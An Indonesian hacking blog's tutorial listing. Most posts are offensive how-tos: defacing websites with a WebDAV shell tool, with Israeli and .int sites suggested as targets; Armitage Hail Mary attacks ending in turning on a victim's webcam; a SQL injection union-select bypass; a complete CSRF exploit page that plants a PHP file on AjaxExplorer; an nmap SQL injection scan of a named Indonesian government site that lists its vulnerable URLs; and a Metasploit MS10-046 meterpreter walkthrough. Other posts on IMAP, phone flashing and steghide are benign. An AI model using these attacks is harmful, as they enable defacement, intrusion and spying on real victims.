Showing posts with label Tutorial. Show all posts
Showing posts with label Tutorial. Show all posts

TUTORIAL DEFACE WEBSITE MENGGUNAKAN WEBDAV

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc_hJpFeeMjuhYWUnavbNJx_lWGHXwO2qhzEIW_cw4TC5xS5wnadGSERmjLKqlpZqJo_ejh2HyGOilEPHoZBnS3r7EO45FadSxRRJDN49FgqQXvdpluqjQ4dlLQpiJpDptZYN1KVG0xkY/s1600/dav.png
Ketemu lagi dengan saya. dalam artikel ini saya akan memberikan TUTORIAL DEFACE WEBSITE MENGGUNAKAN WEBDAV (HMEI7). Langsung aja simak yaa..

1. DOWNLOAD HMEI7 . DISINI
1. BUKA WEBDAV
2. KLIK WEBDAV > ASP SHELL MAKER
3. KLIK SETTING> UPLOAD SCRIPT DEFACE KAMU
4. GANTI /Hmei7.asp;.txt MENJADI SCRIPT KAMU CONTOH /AIUH.HTML
5. ADD SITE.. KALO SAYA MANUAL NYARI SENDIRI DI GOOGLE BIASANYA YG BERDOMAIN CO.IL(israel) ATAU (INT) YG GAMPANG KENA DEFACE WEBDAV
6. LALU KLIK SERANG

KALO BELOM JELAS TONTON PIDEONYA WKWK :V


 

TUTORIAL ARMITAGE



Hari ini ane mau sharing sedikit pengetahuan ane tentang armitage.

Oke langsung aja deh ...

untuk menjalankan Armitage di Kali Linux. caranya mungkin beda sama yang tutor di google. Tapi sama saja sebenarnya tergantung kita sebagai user nya.

buka konsole ketik:

root@bt:~# msfgui > klik start new msfrpcd 

nanti keluar dialog box msfgui dan tunggu sebentar sampai loading nya selesai.......

Lalu pilih > file > show connections detail

nah nanti akan keluar dialog box baru lagi, jangan ditutup kita perlu pass nya untuk masuk ke armitage

sekarang buka konsole baru:
root@bt:~# armitage (atau dari menu juga bisa, terserah aja)

nah kalo semuanya berjalan dengan lancar tampilannya nanti begini:



oke, kita tinggal samain aja pass di connection detail ke armitage.
nah kalo udah tinggal klik connect

Kalo ga ada yang salah langkah2 nya Insya Allah berhasil, terus kalo sudah masuk ke armitage kita closed connection detail dan msfgui tapi jangan di stop
file > quit > No


Quote:Sekarang ane anggap udah pada masuk ke armitage.
kalo udah masuk armitage langsung aja pilih menu:

Hosts > Nmap > Quick scan (OS detect)
masukin Router Ip Contoh: 192.168.100.1/24 

tunggu sebentar sambil CoolCoolCool 
nanti akan muncul IP address yang lagi online beserta OS yang dipakai.
kalo berhasil nanti keluarnya begini....(gbr ane ambil dari tutor ane yg di forum sebelah)



oke, langsung aja mainkan hailmary nya.....

pilih menu > attacks > Hailmary > by port > Tunggu lagi deh.......hehehehe
kebanyakan nunggu yaa....mendingan sambil ngupi biar melek

Oiya, hail mary ini otomatis cari sendiri dia exploitnya...
Confused

untuk hasilnya kalo berhasil seperti ini:


IP 192.168.100.12 berhasil dikuasai........heheheheh

selanjutnya terserah anda mau screenshoot atau aktifin webcam atau yang lain nya tinggal klik kanan komputer yg ada petirnya lalu pilih deh yang mau di explore....pokoknya lengkap lah.

kalo ane nyoba aktifin webcam korbn om...



Kalo berhasil mohon jangan di rusak komputer korban, dosa OM.....

Demikianlah sharing sedikit tentang Armitage > Hailmary..

SQL INJECTION 'ORDER BY 10000' AND STILL NOT ERROR?




Okay kali ini mau ngebahas tentang SQL injection lagi tapi ini menggunakan ORDER BY 1000

jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak menghasilkan
target:target.ac.id/bid/utama.php?mod=detail&id=77

coba kita masukkan perinta :
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2


coba kita ganti perintah nya seperti ini
target.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -


hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya


wew pas di kecilin muncul lagi tulisan nya


berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya

coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -


dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya

udah gitu aja, semoga bermanfaat

nah ane selalu mentok disini nih kalo belajar sql injection Big Grin jadinya gak pernah bisa nge-deface wkwk
ane mau nanya om, dasar sih sebenernya, untuk dapet target webnya itu pakek apa? google dork gitu ya om ?

MENANAM SAHAM PADA AJAXEXPLORER 1.10.3.2




Menanam saham harus segera dilakukan sejak dini, agar nanti saat sudah semakin tua tidak terasa saham yang kita miliki semakin banyak. Namun jangan lupa, juga utk melakukan pendataan yang baik pada saham kita sendiri, takut lupa... kalo takut nyimpen saham sendirian, baik2 boleh share sama saya... pasti dijaga baik2... hehehhe...

kenapa saya membuat judul menanam saham?? yaitu tadi karena menanam saham baik dilakukan sejak dini.

lalu apa itu AjaxExplorer? AjaxExplorer kalo saya bilang itu sama kaya tampilan folder dalam windows xp, cuman kemasannya dalam suatu website... gimana yah jelasinnya.. coba liat skrinsut dibawah

kaya gini:



naahh kaya gitu, trus kenapa menanam saham di AjaxExplorer? dalam cerita2 korban papa minta saham seperti di tipi2... hhehhehee,,,, di AjaxExplorer ini membuat saham tidak sesulit saat papa minta saham...

naahh langsung aja kita coba simulasinya di localhost masing2... mohon maaf jika ada kekurangan, karena niatnya cuman saling belajar menanam saham utk masa depan bangsa dan keluarga sekalian.

pertama saya buat download file nya di https://sourceforge.net/projects/ajax-explorer/files/

truss extract, kemudian copas folder yg di extract td "AjaxExplorer 1.10.3.2" di xampp/htdocs

lalu install > > > > >

kalo udah di install

sekarang waktunya utk mencoba serangan RCE (Remote Code Execution)

buat direktori baru di htdocs, anggep aja ceritanya beda serper... jadi nanti targetnya http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/

dan si attacker atau penanam saham (yaitu elu) menggunakan http://localhost/attacker

trus, buat file baru misalnya index.php dalam folder C:\xampp\htdocs\attacker

Code:
<iframe name="DOOM" style="display:none" name="hidden-form"></iframe>
 
<form target="DOOM" id="CSRF2" method="post" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
<input type="hidden" name="strPage" value="control/file/editor" />
<input type="hidden" name="strPath" value="D:/" />
<input type="hidden" name="strFile" value="hehehe.php" />
<input type="hidden" name="strText"
value="<?php echo'Saya menanam saham disini, jadi tolong jaga baik-baik anak kita. Jangan sampai masa dpan dia suram!! Apa lagi jadi Homo atau Hode utk naklukin siberking sama krucut di game onlen';?>" />
</form>
 
<form target="DOOM" id="CSRF1" method="post" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
<input type="hidden" name="strPage" value="control/file/create" />
<input type="hidden" name="strPath" value="D:/" />
<input type="hidden" name="strFile" value="D:/hehehe.php" />
<script>
document.getElementById('CSRF1').submit()
document.getElementById('CSRF2').submit()
</script>
</form>

Untuk memastikan kalau saham berhasil dimasukkan, mari kita pastikan dlu kalau folder C:\xampp\htdocs\AjaxExplorer 1.10.3.2 hanya berisi folder ajaxexplorer atau coba akses http://localhost/AjaxExplorer%201.10.3.2/hehehe.php, kalau object not found berarti belum ada. Karena pada 
AjaxExplorer akan kita tanam file hehehe.php

 

kalo udah, sekarang coba akses http://localhost/attacker menggunakan browser kesayangan

naahhh, sekarang coba periksa kembali, apakah folder yg tadinya kosong ada isinya??

coba akses http://localhost/AjaxExplorer%201.10.3.2/hehehe.php

tadaaaaa.....

 

Sekian dari saya, terimakasih

diterapkan dari sumber: https://www.exploit-db.com/exploits/39876/

CHECKING IMAP DENGAN PYTHON



Ok Guys ! Kali ini mau nyoba untuk memeriksa jumlah email yang belum dibaca di akun IMAP, saya membuat sebuah sript Python. Tapi karena saya tidak ingin query server setiap detik, aku caching nilai dalam file dan update setiap 30 detik. Buat cronjob atau mirip dengan memperbarui file.

</>Code:
#!/usr/bin/env python

import imaplib

obj = imaplib.IMAP4_SSL('xxx.xxx.xxx.xxx', '993')
obj.login('user', 'password')
obj.select()
print len(obj.search(None, 'UnSeen')[1][0].split())

Save di notepad dengan Ekstensi ".php" tanpa tanda "
Selesai , tinggal jalankan saja programnyaOriginally posted on my blog

FLASHING NOKIA X2DS

Perhatian!!

> Ketika flash menggunakan NOKIA CARE SUITE semua data yg ada di memory internal akan
   terhapus.
> flash tidak menghapus masa garansi,selagi dowload software sesuai dengan kode product android.
> pastikan NOKIA X2DS anda memiliki baterai di atas 50%
> Bla menggunakan komputer pribadi,siapkan kuota modem anda  maximal 2Gb minimal 1 GB
> Semua resiko di tanggung anda sendiri DWYOR-DWYOR{Do With Your Own Risk)
> Di rekomendasikan memakai os windows 7/8


Download bahan-bahan di bawah ini;

> Download Driver Nokia X2DS Disni
> Download NOKIA CARE SUITE Disni
> Download data package manager(data ini sudah di edit agar anda dapat mendownload firmware          nokia x2ds anda) Disini
> Download file  UserGroupsConfiguration Disini


Cara install bahan-bahan di atas(sesuai urutan agar berjalan mulus)!;

> Instal Diver Nokia X2DS
  -pilih/tekan nomor 1 untuk install Divers for Nokia X2
  -lalu cucukkan kabel data anda di laptop/komputer anda.(bila di layar desktop terdapat tulisan Nokia     X2 bla bla bla,berarti drivers berhasil di install dengan baik di laptop anda)

  -lepaskan kabel data anda.
>Instal NOKIA CARE SUITE
>Copy file UserGroupsConfiguration di;
   -"C:\Program Files (x86)\Nokia\Nokia Care Suite\Data Package Manager\bin"
   -C:\Program Files (x86)\Nokia\Nokia Care Suite\Multi Software Updater 5",
   -C:\Program Files (x86)\Nokia\Nokia Care Suite\Product Support Tool For Store 5"
>Install data package manager


Memulai flashing;

>Buka NOKIA CARE SUITE di Shortcut Desktop

>Pilih data package manager,dan isi "Product Code" dan "Product Type" sesuai dengan Nokia X2DS anda (cek di Settings - about phone atau buka tutup dan baterai ada dibaliknya) (tested by my Product Code 059v788 Product Type RM-1013)

  -selesai mengisi code product dan type nokia anda,klik tombol search.
  -setelah terdapat frimware yg sesuai dengan code product yg anda cari,klik download selected (tunggu hingga proses download selesai)
  -selesai mendownload firmware yg di butuhkan,tutup.

>Buka/klik 2kali pada Product Support Tool for Store 5

   -pastikan status di kiri pojok "No Connection" jangan pilih/centang "Automatic Product Selection"

   -Klik File - Open Product - masukkan code type"RM-1013"
   - untuk mencari pilihan Nokia X2DS. Pilih - Open. Klik Programming - Recovery
   -Jika firmware sudah didownload dengan benar, maka akan muncul di bagian tengah. Klik, lalu klik Start.
   -ketika muncul intruksi untuk mematikan hp anda>matikan hp anda>tekan tombol volume down dan tombol power secara bersamaan,sampai hp anda bergetar lepas tombol power,jangan lepaskan tombol volume down,tunggu 5 detik lalu lepaskan volume down dan langsung colokan ke PC tunggu sampai driver flashing nya terbaca lalu pencet tombol Retry.

   -tunggu hingga proses selesai.
   -setelah selesai mungkin hp anda akan hidup dengan sendirinya,bila tersangkut di logo NOKIA saja,cabut baterai anda lalu hidupkan hp anda sampai muncul tampilan seperti anda membeli hp baru.
Dan selamat hp anda berhasil flashing

STEGANOGRAPHY MENGGUNAKAN STEGHIDE




Oke di kesempatan kali ini ane mau ngebahas tentang Steganograpy , biasanya ini ada di perlombaan Nasional loh yaitu contohnya "Cyber Defance Competition & Cyber  Jawara" itu yang ane ta

Apa itu Steganograpy?
Steganography adalah teknik menyembunyikan file didalam file.
sebenernya teknik Steganography ini bisa dilakukan dengan berbagai cara gan Big Grin tapi kali ini ane akan menggunakan Steghide Smile
oke! langsung saja!


Sebagai contoh,disini saya akan menyembunyikan CyberCl0wn.txt kedalam cloud.jpg . (saya blm coba pakai format file lain Confused mungkin agan agan bisa bereksperimen sendiri. )

1.Siapkan file .jpg dan .txt ,lalu install Steghide dengan command :

#sudo apt-get install steghide

2.setelah itu ketik "steghide embed -cf cloud.jpg -ef CyberCl0wn.txt"

3.nanti agan akan diminta memasukan password/passpharse,silahkan diisi sesuai keinginan anda Smile

4.Done!

Cara mengextract/mengeluarkan file yang tadi sudah di hide :

1.steghide extract -sf cloud.jpg

2.masukan password/passpharse nya

3.Done,silahkan cek file nya Big Grin

Gampang bukan ? Ok lain kali ane akan bahas tentang Steganograpy tapi dengan cara yang berbeda ntah pakai aplikasi atau manual seperti ini :D , Thank You and See u

Wasalamualaikum Wr.Wb.

SCAN VULN SQL INJECTION WITH NMAP



Kali ini ane ngebahas tentang cara mencari celah sql injection dengan script yang ada di NMAP. maaf bila ada salah karna manusia tidak luput dari kesalahanBlush 
command line yang saya gunakan 
Code:
Kuro@ISD-TeaM!~#: nmap -sV --script=http-sql-injection www.target.com -Pn -p 80

keterangan :
-sV : untuk mendeteksi versi pada sistem operasi
--script : untuk memanggil script nmap yang akan di gunakan (untuk mencari script nmap yang lain nya ketik locate *.nse)
-Pn : untuk melewati proses identifikasi host yang sedang hidup (no ping)
-p : port yang digunakan

disini saya akan test situs http://www.depkes.go.id

Code:
Kuro@ISD-TeaM!~#: nmap -sV --script=http-sql-injection www.depkes.go.id -Pn -p 80

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-10 03:01 EST
Nmap scan report for www.depkes.go.id (202.70.136.4)
Host is up (0.026s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((Oracle))
|_http-server-header: Apache/2.2.15 (Oracle)
| http-sql-injection: 
|   Possible sqli for queries:
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/?pg=profil_kesehatan_provinsi%27%20OR%20sqlspider&act=page
|     http://www.depkes.go.id/pdf.php?id=a01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/?pg=profil_kesehatan_provinsi%27%20OR%20sqlspider&act=page
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/pdf.php?id=16030500001%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|_    http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.95 seconds

nah ternyata pada situs tersebut terdapat vulneralbility sql injection, untuk memastikan nya kita buka browser lalu copas salah satu link vuneralbility nya
contoh :

Code:
http://www.depkes.go.id/index.php?lg=LN01

tambahkan kutip pada akhir alamat url, dan ini hasil nya.

[Image: 10qb7e1.jpg]


ini saya buat video nya juga cekidoot
semoga bermanfaat dan mohon maaf bilang banyak salah dalam thread ini

Cara Me-remote Windows 7 Menggunakan Metasploit di kali Linux



 Hallo sobat cyber kali ini saya akan menunjukan bagaimana cara nge-hack OS windows 7 menggunakan metasploit di kali linux, Mengekspolitasi kerentangan jendela untuk masuk kedalam sistem dengan username dan password menggunakan metasploit.

Sebelum nge-hack, Anda ingin mengetahui karangka metasploit. jika anda baru di dunia hacking anda harus mengetahui itu, bagaimana anda mau menjadi elit kalo hal itu anda tidak tau.??
Metasploit-porject adalah proyek keamanan komputer yang menyediakan informasi tentang kerentangan keamanan dan bantuan dalam pengujian penetrasi dan pengembangan IDS.

yang paling terkenal  sub-proyek adalah open source Metasploit Framework, alat untuk mengembangakn dan melaksanakan memanfaatkan code terhadap mesin target jarak jau, sub-proyek lainya termasuk database Opcode shellcode dan terkait dengan penilitian perusahaan yang besar didalam dunia maya

Dan metasploit projeck terkenal alat anti-forensic dan penggelapan, dari beberapa banyaknya yang digabung kedalam Metasploit Framework

Persyaratan :
  • install Metasploit di kali linux 
  • Rokok Dan Kopinya bous
  • dan korek api biar bisa dinyalain rokoknya bos
Gak usah banyak bacot lagi, langsungke TKP
perhatitikan dengan teliti..............

 1. Langkah pertama buka terminal kesayangan anda dan ketikan msfconsole. 

 

2. Setelah msfconsule terbuka, ketikan perintah ini untuk mencari module 
 #msf > expolit/windows/browser/ms 10_046_shortcut_icon_dllloader.


3. Setelah itu kitikan #msf > set payload windows/meterpreter/reverse_tcp


4. Sekarang waktunya untuk melakukan beberapa konfigurasi untuk exploit/payload yang baru saja kita    atur, caranya kitikan perintah #msf > show options, (ingat anda harus mendapatkan dibawa output yang defaul.)


5. Sekarang kita harus mangatur hots local untuk konfigurasi, caranya ketik
   #msf > set SRVHOST 192.168.31.20 (IP yang sedang kita gunakan)


6.Setelah kita mengatur hots local konfigurasinya , sekarang ketik
#msf > set LHOST 192.168.31.20 (IP yang sedang kita gunakan)


7.Sekarang kita periksa apakah konfigurasi diterapkan, ketikan #msf > show options.


8.Sekarang kita star exploit, kitikan perintah #msf > exploit


9.Setelah di eksekukusi kita harus "Server Started" (perlu di ingat pastikan bahwa server tidak               berjalan layanan web pada port 80) dan pada komputer korban cukup membuka Internet Explorer dan membuka http//192.168.31.20 (IP yang sudah kita buat tadi) maka kumputernya udah kita kuasai, artinya kita sudah berhasil bro ^_^ , liat gambar dibawah ini.


CATATAN : akan memberikan sebuah pop-up yang meminta izin, clik ALLOW dan pastikan anda tidak memiliki anti virus yang, Anda dapat memeriksa jumlah sesi yang terhubung sukses dengan menjalankan perintah session -i 1 , liat gambar di bawah ini.


Setelah linux sudah terhubung dengan isi didalam sistem, kita sudah memiliki kontrol sepenuhnya jadi silakan anda kembangkan sendiri.

PERHATIAN : tutorial ini hanya untuk tujan pendidikan saja